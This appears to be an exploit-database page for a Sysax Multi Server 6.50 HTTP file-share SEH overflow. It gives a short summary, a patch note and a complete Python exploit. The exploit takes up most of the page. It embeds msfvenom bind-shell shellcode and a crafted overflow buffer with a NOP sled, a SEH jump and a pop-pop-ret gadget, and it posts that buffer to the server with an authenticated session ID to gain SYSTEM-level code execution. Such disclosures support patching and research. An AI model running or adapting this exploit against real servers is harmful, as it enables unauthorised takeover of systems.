header-logo
Suggest Exploit
vendor:
Sysax Multi Server
by:
Paul Purcell
7.5
CVSS
HIGH
Remote Code Execution
CWE
Product Name: Sysax Multi Server
Affected Version From: 6.5
Affected Version To: 6.5
Patch Exists: YES
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Windows XP SP3 English
2016

Sysax Multi Server 6.50 HTTP File Share SEH Overflow RCE Exploit

This is a post authentication exploit that requires the HTTP file sharing service to be running on Sysas Multi Server 6.50. The SID can be retrieved from your browser's URL bar after logging into the service. Once exploited, the shellcode runs with SYSTEM privileges. In this example, we attack folder_ in dltslctd_name1.htm. The root path of the user shouldn't break the buffer offset in the stack, though the user will need to have permission to delete folders. If the user has file delete permissions, file_ will work as well. mk_folder1_name1 is also vulnerable with a modified buffer, so this same exploit can be modified to adapt to a users permissions.

Mitigation:

Update to the latest version (6.51) which contains the patch.
Source

Exploit-DB raw data:

# Exploit Title: Sysax Multi Server 6.50 HTTP File Share SEH Overflow RCE Exploit
# Date: 03/21/2016
# Exploit Author: Paul Purcell
# Contact: ptpxploit at gmail
# Vendor Homepage: http://www.sysax.com/
# Vulnerable Version Download: http://download.cnet.com/Sysax-Multi-Server/3000-2160_4-76171493.html (6.50 as of posting date)
# Version: Sysax Multi Server 6.50
# Tested on: Windows XP SP3 English
# Category: Remote Code Execution
#
# Timeline: 03/11/16 Bug found
#           03/14/16 Vender notified
#           03/17/16 Vender acknowledges issue and publishes patch (6.51)
#           03/21/16 Exploit Published
#
# Summary:  This is a post authentication exploit that requires the HTTP file sharing service to be running on
#           Sysas Multi Server 6.50. The SID can be retrieved from your browser's URL bar after logging into the
#           service. Once exploited, the shellcode runs with SYSTEM privileges.  In this example, we attack folder_
#           in dltslctd_name1.htm.  The root path of the user shouldn't break the buffer offset in the stack, though
#           the user will need to have permission to delete folders.  If the user has file delete permissions, file_
#           will work as well.  mk_folder1_name1 is also vulnerable with a modified buffer, so this same exploit can
#           be modified to adapt to a users permissions.

import httplib

target = 'webbackup'
port = 80
sid = '57e546cb7204b60f0111523409e49bdb16692ab5'            #retrieved from browser URL after login
#example: http://hostname/scgi?sid=57e546cb7204b60f0111523409e49bdb16692ab5&pid=dltslctd_name1.htm

#msfvenom -p windows/shell_bind_tcp LPORT=4444 --platform windows -a x86 -f c -b "\x00\x0a"

shell=("\x6a\x52\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xd7\xae"
"\x73\xe9\x83\xeb\xfc\xe2\xf4\x2b\x46\xf1\xe9\xd7\xae\x13\x60"
"\x32\x9f\xb3\x8d\x5c\xfe\x43\x62\x85\xa2\xf8\xbb\xc3\x25\x01"
"\xc1\xd8\x19\x39\xcf\xe6\x51\xdf\xd5\xb6\xd2\x71\xc5\xf7\x6f"
"\xbc\xe4\xd6\x69\x91\x1b\x85\xf9\xf8\xbb\xc7\x25\x39\xd5\x5c"
"\xe2\x62\x91\x34\xe6\x72\x38\x86\x25\x2a\xc9\xd6\x7d\xf8\xa0"
"\xcf\x4d\x49\xa0\x5c\x9a\xf8\xe8\x01\x9f\x8c\x45\x16\x61\x7e"
"\xe8\x10\x96\x93\x9c\x21\xad\x0e\x11\xec\xd3\x57\x9c\x33\xf6"
"\xf8\xb1\xf3\xaf\xa0\x8f\x5c\xa2\x38\x62\x8f\xb2\x72\x3a\x5c"
"\xaa\xf8\xe8\x07\x27\x37\xcd\xf3\xf5\x28\x88\x8e\xf4\x22\x16"
"\x37\xf1\x2c\xb3\x5c\xbc\x98\x64\x8a\xc6\x40\xdb\xd7\xae\x1b"
"\x9e\xa4\x9c\x2c\xbd\xbf\xe2\x04\xcf\xd0\x51\xa6\x51\x47\xaf"
"\x73\xe9\xfe\x6a\x27\xb9\xbf\x87\xf3\x82\xd7\x51\xa6\x83\xdf"
"\xf7\x23\x0b\x2a\xee\x23\xa9\x87\xc6\x99\xe6\x08\x4e\x8c\x3c"
"\x40\xc6\x71\xe9\xc6\xf2\xfa\x0f\xbd\xbe\x25\xbe\xbf\x6c\xa8"
"\xde\xb0\x51\xa6\xbe\xbf\x19\x9a\xd1\x28\x51\xa6\xbe\xbf\xda"
"\x9f\xd2\x36\x51\xa6\xbe\x40\xc6\x06\x87\x9a\xcf\x8c\x3c\xbf"
"\xcd\x1e\x8d\xd7\x27\x90\xbe\x80\xf9\x42\x1f\xbd\xbc\x2a\xbf"
"\x35\x53\x15\x2e\x93\x8a\x4f\xe8\xd6\x23\x37\xcd\xc7\x68\x73"
"\xad\x83\xfe\x25\xbf\x81\xe8\x25\xa7\x81\xf8\x20\xbf\xbf\xd7"
"\xbf\xd6\x51\x51\xa6\x60\x37\xe0\x25\xaf\x28\x9e\x1b\xe1\x50"
"\xb3\x13\x16\x02\x15\x83\x5c\x75\xf8\x1b\x4f\x42\x13\xee\x16"
"\x02\x92\x75\x95\xdd\x2e\x88\x09\xa2\xab\xc8\xae\xc4\xdc\x1c"
"\x83\xd7\xfd\x8c\x3c")

arg="folder_"                       #can also be changed to file_ if user has file delete permissions
pid="dltslctd_name1"                #Can be changed, though padding will needed to be updated as well 
junk1="A"*26400                     #Initial pile of junk
noppad="\x90"*296                   #Place to land from our long jump and before our shellcode
junkfill="\x90"*(768-len(shell))    #Fill in after our shellcode till nseh    
nseh="\xeb\x06\x90\x90"             #Short jump over SEH
seh="\xd7\x2a\x92\x5d"              #pop esi # pop edi # ret RPCNS4.dll
jump="\xe9\x13\xfc\xff\xff"         #jump back 1000 bytes for plenty of room for your shellcode
junk2="D"*9500                      #Junk at the end


buff=(arg+junk1+noppad+shell+junkfill+nseh+seh+jump+junk2)

 
head = "Host: Wee! \r\n"
head += "User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0\r\n"
head += "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"
head += "Accept-Language: en-us,en;q=0.5\r\n"
head += "Accept-Encoding: gzip, deflate\r\n"
head += "Referer: http://gotcha/scgi?sid="+sid+"&pid="+pid+".htm\r\n"
head += "Proxy-Connection: keep-alive\r\n"
head += "Content-Type: multipart/form-data; boundary=---------------------------20908311357425\r\n"
head += "Content-Length: 1337\r\n"
head += "If-Modified-Since: *\r\n"
head += "\r\n"
head += "-----------------------------217830224120\r\n"
head += "\r\n"
head += "\r\n"
head += "\r\n"
head += buff

conn = httplib.HTTPConnection(target,port)
conn.request("POST", "/scgi?sid="+sid+"&pid="+pid+".htm", head)